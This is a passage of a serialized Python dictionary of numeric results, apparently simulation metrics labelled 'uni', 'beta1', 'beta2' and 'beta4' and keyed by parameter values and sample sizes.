'beta4': [0.0378678387401122, 1.244366535166112]}, 30: {'uni': 0.3386998692888889, 'beta1': 0.17154505920663973, 'beta2': 0.5992798646163214, 'beta4': [0.04917302283275163, 1.194126104878338]}, 20: {'uni': 0.39792219959430253, 'beta1': 0.2815541940784873, 'beta2': 0.747900941602933, 'beta4': [0.07551408684570264, 1.1705837460113553]}, 10: {'uni': 0.7085450643682678, 'beta1': 0.557285657062697, 'beta2': 0.7923738502247967, 'beta4': [0.12363410621488621, 1.1294702859709835]}}, 50: {1000: {'uni': 0.23388680552857205, 'beta1': 0.13013243901878963, 'beta2': 0.6069060830560372, 'beta4': [0.04117425543950271, 1.726982497483725]}, 750: {'uni': 0.3342542025053256, 'beta1': 0.09407677111881815, 'beta2': 0.6556558666300236, 'beta4': [0.04155147758863826, 1.6460758790319159]}, 500: {'uni': 0.2617400572920262, 'beta1': 0.08307527401736141, 'beta2': 0.913211655734957, 'beta4': [0.03865102052127645, 1.674268391357043]}, 400: {'uni': 0.2336538445225923, 'beta1': 0.0909012667517591, 'beta2': 0.6047353172470049, 'beta4': [0.040143198002047804, 1.6326149671287367]}, 300: {'uni': 0.23389869183851916, 'beta1': 0.08029673340728087, 'beta2': 0.7026588056699414, 'beta4': [0.03965227169879199, 1.5907846517974022]}, 200: {'uni': 0.24968943018733125, 'beta1': 0.08712704367432451, 'beta2': 0.6937256962543127, 'beta4': [0.03710393937932573, 1.5913617461424383]}, 150: {'uni': 0.2129598307100895, 'beta1': 0.08626171616487283, 'beta2': 0.6701299168130738, 'beta4': [0.04222205851236509, 1.4852236379671524]}, 100: {'uni': 0.294268810869127, 'beta1': 0.09392120576589265, 'beta2': 0.6588802567689228, 'beta4': [0.03189977184975169, 1.479025526521639]}, 75: {'uni': 0.20370496994007078, 'beta1': 0.08620506713922738, 'beta2': 0.8834851122792289, 'beta4': [0.0319486848668279, 1.5309361694540307]}, 50: {'uni': 0.26087340026827105, 'beta1': 0.08395940396348044, 'beta2': 0.9159051514594372, 'beta4': [0.039168451848731425, 1.383841945680644]}, 30: {'uni': 0.3325714781963125, 'beta1': 0.15878413600643707, 'beta2': 0.8205263409406076, 'beta4': [0.04978681556769162, 1.3087756883985266]}, 20: {'uni': 0.42221900278176994, 'beta1': 0.22043433453119662, 'beta2': 0.7218703048306292, 'beta4': [0.07200305013037528, 1.2953604206103195]}, 10: {'uni': 0.7118146005654853, 'beta1': 0.5550103219492982, 'beta2': 0.8332806436554525, 'beta4': [0.11416986569421834, 1.192908742724074]}}, 30: {1000: {'uni': 0.39344771901594, 'beta1': 0.20706826216296173, 'beta2': 1.0378238557282666, 'beta4': [0.06402478683767453, 2.0914805409739223]}, 750: {'uni': 0.39030540148633164, 'beta1': 0.2198275946592076, 'beta2': 0.8834133901640486, 'beta4': [0.06307415740510106, 2.6350773192000805]}, 500: {'uni': 0.41888410414718413, 'beta1': 0.23122088686383846, 'beta2': 0.9340881005678076, 'beta4': [0.07167461301839322, 1.9609099596987858]}, 400: {'uni': 0.3377834589368441, 'beta1': 0.29762769921415416, 'beta2': 0.9285193846147385, 'beta4': [0.07390554519418496, 2.0702923109061]}, 300: {'uni': 0.6212256230961715, 'beta1': 0.2304534632287249, 'beta2': 0.9311442743499334, 'beta4': [0.0811370567517077, 1.8612702544609139]}, 200: {'uni': 0.40692874449521754, 'beta1': 0.2118536070891281, 'beta2': 0.8911524179154159, 'beta4': [0.068806307218875, 2.171137352139534]}, 150: {'uni': 0.39609796269299596, 'beta1': 0.20321160515473333, 'beta2': 0.9669393676536236, 'beta4': [0.07734188357043241, 2.0488754578525183]}, 100: {'uni': 0.47772960467285025, 'beta1': 0.23955521840544636, 'beta2': 1.093114783205816, 'beta4': [0.05647999347792319, 1.819279948595649]}, 75: {'uni': 0.49459915760994133, 'beta1': 0.7483228974591984, 'beta2': 1.0654241514219611, 'beta4': [0.05644331173725911, 1.8741005355316103]}, 50: {'uni': 0.4331535731141004, 'beta1': 0.23066294747587374, 'beta2': 1.045610584576763, 'beta4': [0.07252811484011165, 1.7866575621465575]}, 30: {'uni': 0.46993365210460936, 'beta1': 0.21062378826486575, 'beta2': 0.8982216898416053, 'beta4': [0.06060427283519371, 1.5645153212622234]}, 20: {'uni': 0.4600252576437871, 'beta1': 0.2996794531583841, 'beta2': 1.0103881743096814, 'beta4': [0.07026605480971959, 1.4899469734392818]}, 10: {'uni': 0.6594503348248166, 'beta1': 0.6052142478169568, 'beta2': 0.9869014312815094, 'beta4': [0.13715957666261736, 1.4056236673782823]}}, 20: {1000: {'uni': 0.7214489274861283, 'beta1': 0.7109602540608293, 'beta2': 1.4891565362913541, 'beta4': [0.10993312172398585, 2.4810788188995145]}, 750: {'uni': 0.8741829459110129, 'beta1': 0.6454387408943474, 'beta2': 1.3967706446447408, 'beta4': [0.10004324893926338, 2.22889028771558]}, 500: {'uni': 0.7729649834330807, 'beta1': 0.6947447893498436, 'beta2': 1.6680333781865306, 'beta4': [0.09859672804685067, 2.3474935663134167]}, 400: {'uni': 0.8037659477540411, 'beta1': 0.7015941173311855, 'beta2': 1.2339541081317063, 'beta4': [0.09169952977240271, 2.3104115893066273]}, 300: {'uni': 0.7479852286057033, 'beta1': 0.5048924805863739, 'beta2': 1.2057595986711336, 'beta4': [0.09546498930528277, 2.5352386394449127]}, 200: {'uni': 0.6052348664014313, 'beta1': 0.6718924234071889, 'beta2': 1.365705564221558, 'beta4': [0.1041836789818561, 2.4944754731499743]}, 150: {'uni': 0.7688254742087617, 'beta1': 0.6261770101829472, 'beta2': 1.2884360012787288, 'beta4': [0.09317440733924622, 2.4938849555699267]}, 100: {'uni': 0.71957651254854, 'beta1': 0.783943623581165, 'beta2': 1.1750563274777475, 'beta4': [0.07906754869135671, 2.611732685956283]}, 75: {'uni': 0.7212663908569285, 'beta1': 0.7491438048083165, 'beta2': 1.278401781969983, 'beta4': [0.09482530961721904, 2.314169022600685]}, 50: {'uni': 0.6513534744070623, 'beta1': 0.4853982257852653, 'beta2': 1.2421157076252283, 'beta4': [0.09218054510962954, 2.1348513584225044]}, 30: {'uni': 0.6801650950857789, 'beta1': 0.4735199294026357, 'beta2': 1.1720266455494714, 'beta4': [0.08458494028243027, 1.9719368906208312]}, 20: {'uni': 0.7808504905420437, 'beta1': 0.8855164069561684, 'beta2': 1.687205161553261, 'beta4': [0.07993917695329548, 2.018904621369056]}, 10: {'uni': 0.9041310834722268, 'beta1': 0.7158435630266999, 'beta2': 1.441125642826424, 'beta4': [0.13713575135187742, 1.6132607653419426]}}, 10: {1000: {'uni': 2.291865093409438, 'beta1': 3.796391956407082, 'beta2': 3.1343136686310404, 'beta4': [0.16591181945616454, 3.906378172009109]}, 750: {'uni': 2.06579510564522, 'beta1': 2.171132303701963, 'beta2': 2.43170413233102, 'beta4': [0.1714184982061991, 3.769544241401269]}, 500: {'uni': 1.7971825445298801, 'beta1': 2.8958816024514253, 'beta2': 2.3653595606869926, 'beta4': [0.20241339836195862, 4.077588626656164]}, 400: {'uni': 2.9424629521344974, 'beta1': 2.175911759881622, 'beta2': 2.604315847454542, 'beta4': [0.16266017066247487, 3.922604522260496]}, 300: {'uni': 1.9501226945273409, 'beta1': 3.782840007260135, 'beta2': 2.4106789863691453, 'beta4': [0.19330939984065848, 3.9702653485690873]}, 200: {'uni': 1.9928797910462663, 'beta1': 2.544676640580035, 'beta2': 2.818092333476372, 'beta4': [0.19321946623916747, 4.280267345101734]}, 150: {'uni': 2.6518203037821433, 'beta1': 2.6301937163774207, 'beta2': 2.662964550514325, 'beta4': [0.21170321149282043, 3.556982875367642]}, 100: {'uni': 2.899996349799425, 'beta1': 4.938592490365132, 'beta2': 3.2946845207767494, 'beta4': [0.20970024710748755, 4.918212312376091]}, 75: {'uni': 2.2712541486054723, 'beta1': 3.6115973476133356, 'beta2': 2.662909535043666, 'beta4': [0.19697867293373564, 3.6544730606284994]}, 50: {'uni': 1.8507652388899076, 'beta1': 2.535719173511266, 'beta2': 3.4567115555436216, 'beta4': [0.18431463594573702, 3.8942424792269956]}, 30: {'uni': 2.259855972095226, 'beta1': 2.507575552707849, 'beta2': 3.206096601185821, 'beta4': [0.1930477272227709, 2.9865306063349633]}, 20: {'uni': 3.323417704391435, 'beta1': 2.0495630344146014, 'beta2': 3.725865413632031, 'beta4': [0.1591708091618429, 4.0725701537088925]}, 10: {'uni': 2.683590243185979, 'beta1': 2.5526577443663645, 'beta2': 3.2041752255912126, 'beta4': [0.15035404637826302, 3.3085549636814515]}}}, 0.001: {1000: {1000: {'uni': 0.013537109538788296, 'beta1': 0.0004418669610901742, 'beta2': 0.2697608014805966, 'beta4': [0.0020188419600072316, 1.0765969581860098]}, 750: {'uni': 0.015518737693553651, 'beta1': 0.0004474752413131278, 'beta2': 0.3049834574567616, 'beta4': [0.002928484716195256, 1.0723749161682772]}, 500: {'uni': 0.025492576200161737, 'beta1': 0.00126278309841898, 'beta2': 0.2947895955099542, 'beta4': [0.004139147290479029, 1.06380419459373]}, 400: {'uni': 0.027388914557718014, 'beta1': 0.0017858676691235038, 'beta2': 0.2940695060349895, 'beta4': [0.004940725691007278, 1.0646782930881278]}, 300: {'uni': 0.043679103650868634, 'beta1': 0.004146600715111695, 'beta2': 0.3221074594010006, 'beta4': [0.0058809014285304325, 1.05171679158162]}, 200: {'uni': 0.055850905773996797, 'beta1': 0.012286663899209264, 'beta2': 0.35495235902886635, 'beta4': [0.011747346538206456, 1.0444923375059274]}, 150: {'uni': 0.07571408794730279, 'beta1': 0.00999545083178083, 'beta2': 0.39339731864243854, 'beta4': [0.015654464010031004, 1.04119667050509]}, 100: {'uni': 0.12878417183859997, 'beta1': 0.02319251025329732, 'beta2': 0.42206919367400175, 'beta4': [0.02605154363623979, 1.032808860624055]}, 75: {'uni': 0.17671912769998804, 'beta1': 0.04651753009023005, 'beta2': 0.48290210890860846, 'beta4': [0.02542438975055508, 1.028587880357103]}, 50: {'uni': 0.2080017791039395, 'beta1': 0.09510052489274758, 'beta2': 0.5532686352849299, 'beta4': [0.04866446156086449, 1.024036289107115]}, 30: {'uni': 0.37174873647872525, 'beta1': 0.1763556838455918, 'beta2': 0.6073687185809629, 'beta4': [0.06065616138133705, 1.0204732817389364]}, 20: {'uni': 0.4706009281641317, 'beta1': 0.4172241498005575, 'beta2': 0.7267012642157473, 'beta4': [0.0878371580829132, 1.016042382017103]}, 10: {'uni': 0.6884462251280654, 'beta1': 0.6504310410056453, 'beta2': 0.8578616568198645, 'beta4': [0.17123050769669146, 1.0114288240221012]}}, 750: {1000: {'uni': 0.014032662653447249, 'beta1': 0.0004197603947433533, 'beta2': 0.3224155552733178, 'beta4': [0.0025877927402001293, 1.0992758471396775]}, 750: {'uni': 0.017656930734368415, 'beta1': 0.0006179708996352925, 'beta2': 0.32112678688815993, 'beta4': [0.0027850509560516695, 1.0896392012982408]}, 500: {'uni': 0.022487140809604803, 'beta1': 0.0015712340706562924, 'beta2': 0.306535854228737, 'beta4': [0.0036538931964645595, 1.0768857039245323]}, 400: {'uni': 0.02931711450909471, 'beta1': 0.0015953956989447965, 'beta2': 0.2940021793382613, 'beta4': [0.004512162746165237, 1.0787914212103158]}, 300: {'uni': 0.03797549613105823, 'beta1': 0.004238318530411427, 'beta2': 0.31851063220054193, 'beta4': [0.0070433871318897785, 1.0709324943449523]}, 200: {'uni': 0.0672635192185687, 'beta1': 0.01475666235800533, 'beta2': 0.36095052393035215, 'beta4': [0.010745748507439314, 1.060093775811335]}, 150: {'uni': 0.0782012161107774, 'beta1': 0.012171034981107647, 'beta2': 0.3989466015618546, 'beta4': [0.012275235549252002, 1.055035316087489]}, 100: {'uni': 0.1111671462254427, 'beta1': 0.03504805392658513, 'beta2': 0.4399388718825932, 'beta4': [0.023290484838746617, 1.0414289777455785]}, 75: {'uni': 0.1467229116392003, 'beta1': 0.03154826354242117, 'beta2': 0.46545805237237575, 'beta4': [0.027567286039267083, 1.0413459531642508]}, 50: {'uni': 0.23242853631519125, 'beta1': 0.08764681410239905, 'beta2': 0.5282997805478701, 'beta4': [0.043790203869254855, 1.0312059461852012]}, 30: {'uni': 0.33478090270484767, 'beta1': 0.19986746017417012, 'beta2': 0.6464281529320948, 'beta4': [0.06216169944957162, 1.024300820754563]}, 20: {'uni': 0.46625228103566874, 'beta1': 0.3352913882162956, 'beta2': 0.7546236949727922, 'beta4': [0.07899091129224035, 1.021045206512229]}, 10: {'uni': 0.7532461209078295, 'beta1': 0.6554865690700844, 'beta2': 0.8689473621561907, 'beta4': [0.15450554655293974, 1.0158420905223018]}}, 500: {1000: {'uni': 0.02208336031576062, 'beta1': 0.0012806271939282098, 'beta2': 0.30491792281941166, 'beta4': [0.004154369009543563, 1.1291796536550491]}, 750: {'uni': 0.0249788378175696, 'beta1': 0.0010797670073452693, 'beta2': 0.34597268013437205, 'beta4': [0.0035547566741248944, 1.145887504602334]}, 500: {'uni': 0.03156864097576366, 'beta1': 0.001878931149848406, 'beta2': 0.33555105256994455, 'beta4': [0.004045741246069753, 1.1111524120461513]}, 400: {'uni': 0.02964039049766577, 'beta1': 0.0028752475332747426, 'beta2': 0.3189895492462362, 'beta4': [0.004475496924442904, 1.0985004462671362]}, 300: {'uni': 0.04054286140926675, 'beta1': 0.0030530447014601707, 'beta2': 0.33602501575095534, 'beta4': [0.005807153069867216, 1.089948008106302]}, 200: {'uni': 0.06368154738558036, 'beta1': 0.009413172181526356, 'beta2': 0.35093318039296945, 'beta4': [0.010128392991850291, 1.0749455354962245]}, 150: {'uni': 0.08560979711191868, 'beta1': 0.01814400620954622, 'beta2': 0.3817391631518634, 'beta4': [0.012693849833483756, 1.0766956230098896]}, 100: {'uni': 0.11065760228804478, 'beta1': 0.031931499364947796, 'beta2': 0.42393584933219425, 'beta4': [0.019711926476868896, 1.074086162181026]}, 75: {'uni': 0.13814860825841252, 'beta1': 0.047161838474747725, 'beta2': 0.461454606486388, 'beta4': [0.026718709086169346, 1.0529062226093644]}, 50: {'uni': 0.2924729124618689, 'beta1': 0.08356191139025354, 'beta2': 0.5416545481337098, 'beta4': [0.048513803361591896, 1.047349564419994]}, 30: {'uni': 0.38994864567008714, 'beta1': 0.21557372764244884, 'beta2': 0.6108965479787709, 'beta4': [0.059368500830894747, 1.0431355252713714]}, 20: {'uni': 0.42393809596014487, 'beta1': 0.38044506197760547, 'beta2': 0.7206816523302737, 'beta4': [0.08428835003718527, 1.0344086832398853]}, 10: {'uni': 0.7381591918995368, 'beta1': 0.6448622984694605, 'beta2': 0.8475866078699237, 'beta4': [0.16783106781496734, 1.0239303365728043]}}, 400: {1000: {'uni': 0.027326134080412047, 'beta1': 0.0015489118053178246, 'beta2': 0.3257531838269524, 'beta4': [0.004363329218823618, 1.157047980101011]}, 750: {'uni': 0.03269613683176431, 'beta1': 0.00237347642961547, 'beta2': 0.3765112398224541, 'beta4': [0.0044084255091659495, 1.1515364706106115]}, 500: {'uni': 0.02829267608816353, 'beta1': 0.002113478462779276, 'beta2': 0.3699445800604303, 'beta4': [0.005062501969303326, 1.128564031724105]}, 400: {'uni': 0.02982284964668319, 'beta1': 0.0018557251431091941, 'beta2': 0.30418237177038493, 'beta4': [0.0055468098705524094, 1.124759552937044]}, 300: {'uni': 0.03633810592372252, 'beta1': 0.003329752124641255, 'beta2': 0.34503158449761623, 'beta4': [0.00764574873689276, 1.1336601117649365]}, 200: {'uni': 0.0618643630393636, 'beta1': 0.006239455946425697, 'beta2': 0.3893580111719922, 'beta4': [0.008740016065982145, 1.0944415138600063]}, 150: {'uni': 0.08290995558988935, 'beta1': 0.01485769035028909, 'beta2': 0.3895851178723324, 'beta4': [0.014543995199215603, 1.0911947267214124]}, 100: {'uni': 0.12733784071357707, 'beta1': 0.041792640842624705, 'beta2': 0.4170065697291755, 'beta4': [0.019429522082070005, 1.0836887858094717]}, 75: {'uni': 0.1639703758168183, 'beta1': 0.05486987789272019, 'beta2': 0.5020845124417863, 'beta4': [0.02454441092459795, 1.0759262870830304]}, 50: {'uni': 0.2228830962075744, 'beta1': 0.11564754038475192, 'beta2': 0.5212091861747059, 'beta4': [0.047308183312444844, 1.0664568311962506]}, 30: {'uni': 0.3351992860790609, 'beta1': 0.16191267408494092, 'beta2': 0.5937982222349889, 'beta4': [0.06569858803208886, 1.0505472791656445]}, 20: {'uni': 0.5450729893841108, 'beta1': 0.43098366097308594, 'beta2': 0.6960946521774166, 'beta4': [0.08068269657512149, 1.0390693056594573]}, 10: {'uni': 0.7538652232296545, 'beta1': 0.7065202410569426, 'beta2': 0.8402242155683589, 'beta4': [0.15938925995624306, 1.0282263365830497]}}, 300: {1000: {'uni': 0.03623155105790878, 'beta1': 0.0025522247554552115, 'beta2': 0.3467467563959175, 'beta4': [0.007027836875807712, 1.1966502929456388]}, 750: {'uni': 0.0313950547463441, 'beta1': 0.004694441216264605, 'beta2': 0.36722656659770836, 'beta4': [0.0058771168613729555, 1.2034970232663906]}, 500: {'uni': 0.03539489610897603, 'beta1': 0.002663434080378617, 'beta2': 0.36331720497958425, 'beta4': [0.0064603241919073545, 1.1620579992997444]}, 400: {'uni': 0.0351254278473425, 'beta1': 0.00461414127398557, 'beta2': 0.3277459584398935, 'beta4': [0.0068608047998020005, 1.1704067166884702]}, 300: {'uni': 0.03980018699125466, 'beta1': 0.0054655033491287745, 'beta2': 0.3584428215881965, 'beta4': [0.005844562969263582, 1.1451011317868725]}, 200: {'uni': 0.05520695836413316, 'beta1': 0.00648381893317757, 'beta2': 0.38261363002766086, 'beta4': [0.009080285192231337, 1.1358137946469902]}, 150: {'uni': 0.09585002315832265, 'beta1': 0.014666160900098158, 'beta2': 0.3965763572228682, 'beta4': [0.01591317956737841, 1.1209589256111785]}, 100: {'uni': 0.1127142711948545, 'beta1': 0.02363531926273754, 'beta2': 0.45212575945962213, 'beta4': [0.02048277594290429, 1.1031644566986183]}, 75: {'uni': 0.14797467282265053, 'beta1': 0.03809387628580308, 'beta2': 0.4591848632040782, 'beta4': [0.03180981588767595, 1.1063373896373865]}, 50: {'uni': 0.2254379372771143, 'beta1': 0.09345713137258113, 'beta2': 0.5001164965271707, 'beta4': [0.04261601974244967, 1.0797165368273711]}, 30: {'uni': 0.40093684330112, 'beta1': 0.18938608352195094, 'beta2': 0.665032310636, 'beta4': [0.06012863762712923, 1.0658667444693248]}, 20: {'uni': 0.4942285112700853, 'beta1': 0.2885547182303252, 'beta2': 0.6595791693752406, 'beta4': [0.08745746042355958, 1.0536053485041785]}, 10: {'uni': 0.7190345596593238, 'beta1': 0.6651211105848184, 'beta2': 0.826925122122391, 'beta4': [0.16051646670948755, 1.0471478131384455]}}, 200: {1000: {'uni': 0.060057793651372704, 'beta1': 0.006187938996693969, 'beta2': 0.36736477572277093, 'beta4': [0.009293227645305487, 1.267681265906244]}, 750: {'uni': 0.06046594852805391, 'beta1': 0.006509051778350212, 'beta2': 0.41313052787178256, 'beta4': [0.01142723790937598, 1.2309014344313365]}, 500: {'uni': 0.0740362005188402, 'beta1': 0.00849682830778454, 'beta2': 0.3818697598614397, 'beta4': [0.00942075185210953, 1.277912461458182]}, 400: {'uni': 0.04917940985082775, 'beta1': 0.0073151839179716694, 'beta2': 0.37681354718921994, 'beta4': [0.009762298223416793, 1.2374277805357872]}, 300: {'uni': 0.0509887818241694, 'beta1': 0.004721389267464698, 'beta2': 0.4137259989095081, 'beta4': [0.010709445552100886, 1.2195842345664258]}, 200: {'uni': 0.06092018198260521, 'beta1': 0.008126211311259117, 'beta2': 0.41377607585033904, 'beta4': [0.012552773795295888, 1.210814650871189]}, 150: {'uni': 0.08320861100830386, 'beta1': 0.010652599194381862, 'beta2': 0.410588921859252, 'beta4': [0.011377755543899413, 1.1605558296237972]}, 100: {'uni': 0.10647538233235196, 'beta1': 0.02675525864005623, 'beta2': 0.45027686602574685, 'beta4': [0.018774675358622005, 1.1425517213205887]}, 75: {'uni': 0.15075826113503984, 'beta1': 0.03812861351502258, 'beta2': 0.4821830000786633, 'beta4': [0.02588845495636567, 1.1460284931167872]}, 50: {'uni': 0.20748454934236824, 'beta1': 0.07956559814853244, 'beta2': 0.5318809243191449, 'beta4': [0.03400241330970483, 1.131144969956103]}, 30: {'uni': 0.39005891840591755, 'beta1': 0.23508768413194275, 'beta2': 0.604195019511204, 'beta4': [0.07300462632536944, 1.0968699306871237]}, 20: {'uni': 0.47961991346108024, 'beta1': 0.3378509422322994, 'beta2': 0.6949090618591872, 'beta4': [0.08435933637998484, 1.0861750985584178]}, 10: {'uni': 0.7493592487162126, 'beta1': 0.7082252135351613, 'beta2': 0.8233197764550338, 'beta4': [0.16360988217538464, 1.0590739421875983]}}, 150: {1000: {'uni': 0.07246512795587667, 'beta1': 0.00940509489365912, 'beta2': 0.3834121832843376, 'beta4': [0.012061154345627774, 1.346345368105395]}, 750: {'uni': 0.08333214979418102, 'beta1': 0.012019314225734089, 'beta2': 0.41354718085794745, 'beta4': [0.013617336072865511, 1.317803333864672]}, 500: {'uni': 0.07223808071808703, 'beta1': 0.013444843438640032, 'beta2': 0.500497170757918, 'beta4': [0.013732312336221736, 1.3566135025043116]}, 400: {'uni': 0.07412227863180197, 'beta1': 0.009173025234347465, 'beta2': 0.5218918631188576, 'beta4': [0.010646990872949938, 1.3275623997460937]}, 300: {'uni': 0.06027828499856449, 'beta1': 0.008588769483821677, 'beta2': 0.43303765653591175, 'beta4': [0.011001496083177107, 1.2709377624732103]}, 200: {'uni': 0.07740533698799229, 'beta1': 0.01596227776300425, 'beta2': 0.4393860829917456, 'beta4': [0.013707242813425027, 1.235336706709078]}, 150: {'uni': 0.09469289988283666, 'beta1': 0.018010566018472236, 'beta2': 0.46689138360128024, 'beta4': [0.015442744929322542, 1.22737373023355]}, 100: {'uni': 0.10537401955613016, 'beta1': 0.02559635095907498, 'beta2': 0.4483188526069417, 'beta4': [0.020984796579724598, 1.1917347765643078]}, 75: {'uni': 0.1741885047544234, 'beta1': 0.05029710897697464, 'beta2': 0.4832427754379396, 'beta4': [0.02508555719013275, 1.1877236315076742]}, 50: {'uni': 0.23513358008851837, 'beta1': 0.08821603551377359, 'beta2': 0.5410204067376275, 'beta4': [0.03945996719545313, 1.154311026803482]}, 30: {'uni': 0.32655423356767815, 'beta1': 0.23627137526479217, 'beta2': 0.612345924047393, 'beta4': [0.06279287244508759, 1.127521379517458]}, 20: {'uni': 0.43138609640559733, 'beta1': 0.36249312001735073, 'beta2': 0.6879736777963187, 'beta4': [0.11914662239936859, 1.1278478336983744]}, 10: {'uni': 0.7425459718118043, 'beta1': 0.6837968299663986, 'beta2': 0.8665605066074531, 'beta4': [0.1876384389463847, 1.083397954154307]}}, 100: {1000: {'uni': 0.1487676605580423, 'beta1': 0.02437792836645245, 'beta2': 0.49427790334163363, 'beta4': [0.01703482937216448, 1.399548399765302]}, 750: {'uni': 0.11310232265204254, 'beta1': 0.02524996032593586, 'beta2': 0.5217627256964408, 'beta4': [0.01698165245717892, 1.4406554008355783]}, 500: {'uni': 0.11717410083094586, 'beta1': 0.02618543909344974, 'beta2': 0.5383596952242804, 'beta4': [0.023983523561589164, 1.3929126361512172]}, 400: {'uni': 0.119738193458416, 'beta1': 0.02505658785977393, 'beta2': 0.5984167205074813, 'beta4': [0.01926970844980976, 1.4014605002976324]}, 300: {'uni': 0.12233230352897319, 'beta1': 0.030570949763671123, 'beta2': 0.5770761352544695, 'beta4': [0.019784253795192344, 1.4359356389798974]}, 200: {'uni': 0.12207409086081243, 'beta1': 0.02347263628756829, 'beta2': 0.5760897628554611, 'beta4': [0.019990281670087366, 1.3745371518250655]}, 150: {'uni': 0.10542026853254463, 'beta1': 0.02953081474765129, 'beta2': 0.5703573600080448, 'beta4': [0.01916862292541901, 1.2965599971106665]}, 100: {'uni': 0.12606340736638602, 'beta1': 0.029241858812173283, 'beta2': 0.520085462363208, 'beta4': [0.021680149967017056, 1.3380882439868846]}, 75: {'uni': 0.15289116139614062, 'beta1': 0.046818551423756204, 'beta2': 0.5234533249147212, 'beta4': [0.030541975508426033, 1.2737285592668153]}, 50: {'uni': 0.22295673863255383, 'beta1': 0.0777043578096471, 'beta2': 0.5277287922461552, 'beta4': [0.03463272718442295, 1.2507855959253786]}, 30: {'uni': 0.322701566594298, 'beta1': 0.20209878886640079, 'beta2': 0.6446393363434055, 'beta4': [0.057809443205279955, 1.183476927699967]}, 20: {'uni': 0.4881509697552908, 'beta1': 0.32634375809351596, 'beta2': 0.6555377865749321, 'beta4': [0.09881280421760813, 1.1859881340445586]}, 10: {'uni': 0.7185909063724639, 'beta1': 0.6708907363360799, 'beta2': 0.8168268424612932, 'beta4': [0.1552377656555602, 1.121004193526685]}}, 75: {1000: {'uni': 0.20283838067373647, 'beta1': 0.048429921987961456, 'beta2': 0.5254186618618247, 'beta4': [0.02716958040457032, 1.5310324208557173]}, 750: {'uni': 0.13649456208891103, 'beta1': 0.05990815130918355, 'beta2': 0.6143499171511568, 'beta4': [0.025247761507755824, 1.6218068004006065]}, 500: {'uni': 0.17357469505108555, 'beta1': 0.04911574923950298, 'beta2': 0.5392298327482756, 'beta4': [0.025313183659280477, 1.5098847201105141]}, 400: {'uni': 0.1696292678007163, 'beta1': 0.04567710550047028, 'beta2': 0.531791431252953, 'beta4': [0.02843317204287415, 1.511767668283802]}, 300: {'uni': 0.15649352627564092, 'beta1': 0.052458117800853014, 'beta2': 0.6238230721412571, 'beta4': [0.024980744864881454, 1.448139383334922]}, 200: {'uni': 0.16000482751565392, 'beta1': 0.04812942180105504, 'beta2': 0.6848305198014162, 'beta4': [0.026321896909384607, 1.3985133907539185]}, 150: {'uni': 0.21512892236445738, 'beta1': 0.04170656196537403, 'beta2': 0.6484101556394571, 'beta4': [0.028292107396516844, 1.4960535034185667]}, 100: {'uni': 0.17047052520864803, 'beta1': 0.04434589905934036, 'beta2': 0.6147353576676836, 'beta4': [0.031896789192913104, 1.395203205943251]}, 75: {'uni': 0.15498526288207984, 'beta1': 0.05584692512943298, 'beta2': 0.6237541924317974, 'beta4': [0.02517618697832332, 1.3245769159326284]}, 50: {'uni': 0.26311823368421094, 'beta1': 0.08632237956112145, 'beta2': 0.5711379680106714, 'beta4': [0.04746092000571327, 1.3617429879333032]}, 30: {'uni': 0.36091090034892204, 'beta1': 0.18600456221710257, 'beta2': 0.6048666597688582, 'beta4': [0.061077535669381317, 1.2677185233169856]}, 20: {'uni': 0.41610718889687526, 'beta1': 0.3481216835860471, 'beta2': 0.6823292535355998, 'beta4': [0.09228201110020866, 1.2376222120042897]}, 10: {'uni': 0.7381983047748464, 'beta1': 0.6931366409956315, 'beta2': 0.8379903854497059, 'beta4': [0.16766375232596248, 1.2030815682204685]}}, 50: {1000: {'uni': 0.30730495204502717, 'beta1': 0.12683774226991987, 'beta2': 0.758295652904777, 'beta4': [0.033995273995958114, 1.6538716994158296]}, 750: {'uni': 0.2748268412061488, 'beta1': 0.08382717056992495, 'beta2': 0.7404913706816707, 'beta4': [0.04268820403356018, 1.6928867889354913]}, 500: {'uni': 0.21407720814314096, 'beta1': 0.10363951921535253, 'beta2': 0.659551205149009, 'beta4': [0.05049658923489535, 1.6751311937416606]}, 400: {'uni': 0.24125970025430582, 'beta1': 0.08123246944687809, 'beta2': 0.8628937525700389, 'beta4': [0.05894238702800365, 1.5997778968369727]}, 300: {'uni': 0.22589766382811063, 'beta1': 0.09942885166527134, 'beta2': 0.7532476283115479, 'beta4': [0.04082381032197537, 1.6868673631889013]}, 200: {'uni': 0.2591850579641999, 'beta1': 0.08728773319618409, 'beta2': 0.9235193570611554, 'beta4': [0.04818549496425245, 1.6588257461274114]}, 150: {'uni': 0.2556506895317946, 'beta1': 0.0750813441904301, 'beta2': 0.7289289852709729, 'beta4': [0.03313187544593835, 1.6253850040214513]}, 100: {'uni': 0.22229774262566845, 'beta1': 0.0811448635916027, 'beta2': 0.9098362902991676, 'beta4': [0.03530222422489702, 1.5256474346104436]}, 75: {'uni': 0.2521735586774331, 'beta1': 0.09746447495069399, 'beta2': 0.7259112629043855, 'beta4': [0.03833690135899138, 1.5441263026950591]}, 50: {'uni': 0.2616930090766834, 'beta1': 0.14123441320732333, 'beta2': 0.7728043037823017, 'beta4': [0.03330514564613822, 1.4984785036564114]}, 30: {'uni': 0.3777369219546949, 'beta1': 0.3181138500578289, 'beta2': 0.8227214613274908, 'beta4': [0.0647326450741752, 1.4293026049607784]}, 20: {'uni': 0.43054757894409096, 'beta1': 0.3589568856858122, 'beta2': 0.7092031874212259, 'beta4': [0.08521969621604755, 1.3592456219745106]}, 10: {'uni': 0.7193676569866309, 'beta1': 0.654002177380139, 'beta2': 1.0551759887242254, 'beta4': [0.17405948907032012, 1.291814832800615]}}, 30: {1000: {'uni': 0.39051571889875925, 'beta1': 0.3225844223634567, 'beta2': 0.9035558894765073, 'beta4': [0.07704160115380267, 2.227381034694318]}, 750: {'uni': 0.5419984090402282, 'beta1': 0.21755538971134444, 'beta2': 0.899954144980397, 'beta4': [0.07004875190766695, 2.1477522364679]}, 500: {'uni': 0.4412079869283692, 'beta1': 0.22030317510188066, 'beta2': 0.9843616821005815, 'beta4': [0.07667967917770555, 1.9841297602015278]}, 400: {'uni': 0.5283629457513818, 'beta1': 0.2598066986086734, 'beta2': 0.8073163609237236, 'beta4': [0.06868678999251733, 2.072822244613063]}, 300: {'uni': 0.40263354028046217, 'beta1': 0.3001142440813251, 'beta2': 1.0046350150005576, 'beta4': [0.06557265592267082, 1.9586311124743965]}, 200: {'uni': 0.48134354695262954, 'beta1': 0.2392909536632273, 'beta2': 0.8273194635401119, 'beta4': [0.0581293469539461, 2.4265465242403392]}, 150: {'uni': 0.4319884313883664, 'beta1': 0.2294040890895637, 'beta2': 1.1418184324337164, 'beta4': [0.0571712560341279, 1.961245075770029]}, 